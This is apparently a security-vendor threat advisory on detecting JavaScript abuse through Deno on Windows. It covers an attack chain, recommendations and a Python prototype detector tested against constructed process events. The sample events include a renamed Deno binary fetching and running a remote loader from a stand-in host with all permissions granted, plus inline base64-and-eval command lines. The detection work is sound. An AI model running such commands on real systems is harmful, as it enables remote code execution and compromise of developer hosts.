Threat Feed
high advisory

Suspicious JavaScript Execution via Deno

Detects execution of JavaScript via Deno with suspicious command-line patterns (base64, eval, http, or import in a JavaScript context). Adversaries may abuse Deno as a living-off-the-land script host to run malicious JavaScript for code execution or payload staging.

This detection rule identifies suspicious JavaScript execution via the Deno runtime on Windows systems. Deno is a legitimate runtime for JavaScript and TypeScript that ships as a single self-contained executable and will run whatever script it is handed, which makes it an attractive interpreter for adversaries. The rule focuses on command-line patterns indicative of malicious intent: base64 encoding, the eval() function (or Deno's own eval subcommand, which runs code passed directly on the command line), HTTP URLs, and JavaScript imports in a suspicious context. Note that legitimate Deno usage also imports modules over HTTPS, so some of these tokens appear in benign developer activity and the rule needs tuning. This activity is concerning because Deno is rarely covered by controls aimed at PowerShell or Windows Script Host, so attackers can use it to execute arbitrary code for staging further attacks or running malware. The rule detects this activity by monitoring process creation events and analyzing their command lines.

Attack Chain

  1. An attacker gains initial access to a Windows system (e.g., through social engineering, exploiting a vulnerability, or compromised credentials).
  2. The attacker downloads or transfers the deno.exe executable to the compromised system, or reuses a copy already installed on a developer workstation. The executable may be renamed or placed in a non-standard location.
  3. The attacker executes deno.exe with a command line containing suspicious elements such as base64, eval(, http, or import.
  4. Deno interprets and executes the JavaScript code, which may be embedded directly in the command line (e.g., via the deno eval subcommand or an eval() call), fetched from a remote server (via an http or https URL), or imported from a local file.
  5. The JavaScript code performs malicious actions, such as downloading and executing additional payloads, establishing persistence, or exfiltrating data.
  6. The malicious script may rely on Deno's permission flags to escape the runtime's default sandbox. Broad permissions (-A / --allow-all, which grant network, filesystem, environment and subprocess access at once) are especially concerning.
  7. With subprocess permission (--allow-run, included in -A), the Deno process may spawn child processes to further the attacker's objectives, including command interpreters (e.g., cmd.exe, powershell.exe) or other utilities.
  8. The ultimate objective is to achieve code execution, establish persistence, and/or compromise data.

Impact

Successful abuse of Deno gives the attacker arbitrary code execution on the affected system. This can result in data theft, system disruption, or further propagation of malware within the network. Because Deno is most often present on developer workstations and build servers, a compromise of those hosts can extend to source code, signing keys and build artifacts, leading to supply chain compromise. The impact is rated high due to the potential for significant damage and lateral movement within the environment.

Recommendation

  • Deploy the Sigma rule "Suspicious JavaScript Execution via Deno" to your SIEM and tune it for your environment (e.g., allowlist known-good remote module hosts used by your developers) to detect malicious Deno usage without drowning in developer noise.
  • Monitor process creation events for deno.exe execution, focusing on command lines containing base64, eval(, http, or import.
  • Enable command-line capture for process creation (Sysmon Event ID 1, or Windows Security Event ID 4688 with command-line auditing enabled) so the full arguments passed to deno.exe are recorded.
  • Investigate any alerts generated by the "Suspicious JavaScript Execution via Deno" Sigma rule, focusing on the process lineage (which parent launched Deno and which children it spawned), network connections, and file modifications associated with the Deno process.
  • Restrict the usage of Deno to authorized users and systems (e.g., developers, build servers).
  • Implement application control policies (e.g., WDAC or AppLocker) that match on publisher, file hash or the binary's OriginalFileName rather than on path or filename, so renamed or relocated copies of deno.exe are still blocked.
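The attack chain and the recommendations above both come down to one question an analyst has to answer from a process-creation event: is this Deno, and is the command line suspicious? The following is an added example (not the platform's detection query and not Deno project code) that prototypes both rules over a handful of constructed Sysmon-style events. It reads "JavaScript context" as the run or eval subcommand being present, matches Deno by PE OriginalFileName as well as by path so a renamed binary is caught, and includes a benign remote-import event to show the false positive the tuning advice is about. The image paths, hostnames and script bodies in the sample events are invented for the demonstration.

```python
"""Prototype of the two Deno detections over constructed process-creation events.

Approximation for illustration only; the real Sigma queries are kept in the platform.
"""
import shlex

SUSPICIOUS_RULE = "Suspicious JavaScript Execution via Deno"
BROAD_PERMS_RULE = "Deno Execution with Broad Permissions"

# Tokens the advisory lists as suspicious in a JavaScript context.
SUSPICIOUS_TOKENS = ("base64", "eval(", "http", "import")
# Deno subcommands that actually execute JavaScript/TypeScript (assumption:
# this is what "in a JavaScript context" means for the rule).
JS_SUBCOMMANDS = {"run", "eval"}
# Deno's short and long spelling of "grant every permission".
BROAD_PERMISSION_FLAGS = {"-A", "--allow-all"}


def is_deno(event: dict) -> bool:
    """Match on OriginalFileName as well as the path so a renamed deno.exe is caught."""
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").lower()
    return image.endswith("\\deno.exe") or original == "deno.exe"


def split_args(command_line: str) -> list:
    """Split a Windows command line. posix=False keeps quotes attached, so a quoted
    inline script stays one argument and flags inside it do not match as flags."""
    try:
        return shlex.split(command_line, posix=False)
    except ValueError:          # unterminated quote: fall back to whitespace split
        return command_line.split()


def evaluate(event: dict) -> list:
    """Return the names of the rules the event matches (empty list if none)."""
    if not is_deno(event):
        return []
    command_line = event.get("CommandLine", "")
    args = split_args(command_line)[1:]                       # drop the image itself
    subcommand = next((a for a in args if not a.startswith("-")), "").lower()
    hits = []
    if subcommand in JS_SUBCOMMANDS and any(t in command_line.lower() for t in SUSPICIOUS_TOKENS):
        hits.append(SUSPICIOUS_RULE)
    if any(a in BROAD_PERMISSION_FLAGS for a in args):       # exact token, case-sensitive
        hits.append(BROAD_PERMS_RULE)
    return hits


# Constructed Sysmon-style (Event ID 1) events; none of these are real captures.
EVENTS = [
    {   # inline script passed to `deno eval` that decodes a blob and eval()s it
        "Image": r"C:\Users\alice\.deno\bin\deno.exe", "OriginalFileName": "deno.exe",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "deno.exe eval \"const src = atob('Y29uc29sZS5sb2coMSk='); eval(src)\"",
    },
    {   # renamed, relocated copy pulling a remote stager with the sandbox disabled
        "Image": r"C:\Users\Public\Libraries\svchost32.exe", "OriginalFileName": "deno.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "svchost32.exe run -A https://stage.example.net/loader.js",
    },
    {   # benign: formatting source code
        "Image": r"C:\Users\alice\.deno\bin\deno.exe", "OriginalFileName": "deno.exe",
        "ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
        "CommandLine": "deno.exe fmt src",
    },
    {   # benign: scoped permission, local entry point
        "Image": r"C:\Users\alice\.deno\bin\deno.exe", "OriginalFileName": "deno.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "deno.exe run --allow-net=api.example.com server.ts",
    },
    {   # benign remote module import: fires the suspicious rule, hence the tuning advice
        "Image": r"C:\Users\alice\.deno\bin\deno.exe", "OriginalFileName": "deno.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "deno.exe run https://deno.land/x/example_module/mod.ts",
    },
    {   # not Deno at all: same tokens, different runtime, out of scope for these rules
        "Image": r"C:\Program Files\nodejs\node.exe", "OriginalFileName": "node.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "node.exe -e \"eval(atob('Y29uc29sZS5sb2coMSk='))\"",
    },
]


def triage(events: list) -> list:
    """Pair each hit with the parent image, the first lineage fact an analyst wants."""
    return [
        {"parent": e.get("ParentImage", ""), "command": e["CommandLine"], "rules": hits}
        for e in events if (hits := evaluate(e))
    ]


if __name__ == "__main__":
    for row in triage(EVENTS):
        print(f"{', '.join(row['rules'])}\n  parent:  {row['parent']}\n  command: {row['command']}")
```

Two design points carry over to a production query: match Deno on OriginalFileName (or hash/publisher) rather than only on the path, and keep the broad-permission check a case-sensitive exact token so `-A` inside a quoted script body or a module name does not match. The fifth event shows why the rule cannot be deployed untuned on developer hosts.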

Detection coverage (2 rules)

Suspicious JavaScript Execution via Deno

high

Detects execution of JavaScript via Deno with suspicious command-line arguments (base64, eval, http, or import in a JavaScript context).

Format: Sigma. Tactic: Execution. Technique: T1059.007. Log source: process_creation (windows).

Deno Execution with Broad Permissions

medium

Detects execution of Deno with the all-permissions flag (-A / --allow-all), which disables Deno's permission sandbox entirely and is therefore attractive to attackers.

Format: Sigma. Tactic: Execution. Technique: T1059.007. Log source: process_creation (windows).

Detection queries are kept inside the platform.